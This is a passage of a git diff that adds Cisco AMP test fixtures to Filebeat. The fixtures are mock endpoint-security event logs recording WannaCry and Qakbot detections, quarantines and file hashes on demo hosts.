], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T13:06:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204901661835277", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 802000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419204901661835000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 65559, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log new file mode 100644 index 00000000000..9842f3cbe93 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log @@ -0,0 +1,49 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583861114428195000,"timestamp":1610626750,"timestamp_nanoseconds":161000000,"date":"2021-01-14T12:19:10+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264747552596296000,"timestamp":1610626264,"timestamp_nanoseconds":27000000,"date":"2021-01-14T12:11:04+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":756000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.A280012EEE.in10.tht.Talos","detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"X4.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62","sha1":"c235e18bae63d6c4b5daadb833686f943de65a5f","md5":"a659ff79ef7ffacbd61d4c2641379e44"},"parent":{"process_id":4744,"disposition":"Clean","file_name":"wscript.exe","identity":{"sha256":"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97","sha1":"2131cff0959d213cd9a5e8a8ac362d265d5b1316","md5":"045451fa238a75305cc26ac982472367"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411444887895409000,"timestamp":1610625778,"timestamp_nanoseconds":772000000,"date":"2021-01-14T12:02:58+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411444887895408641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_2","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d1:e2:b6:61:ef:7a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":208000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187549993959000,"timestamp":1610625537,"timestamp_nanoseconds":193000000,"date":"2021-01-14T11:58:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419187549993959449","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":853000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2980,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419187537109058000,"timestamp":1610625534,"timestamp_nanoseconds":884000000,"date":"2021-01-14T11:58:54+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419187537109057560","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583853374897127000,"timestamp":1610624948,"timestamp_nanoseconds":562000000,"date":"2021-01-14T11:49:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945825043963,"timestamp":1610624472,"timestamp_nanoseconds":496121997,"date":"2021-01-14T11:41:12+00:00","event_type":"Executed 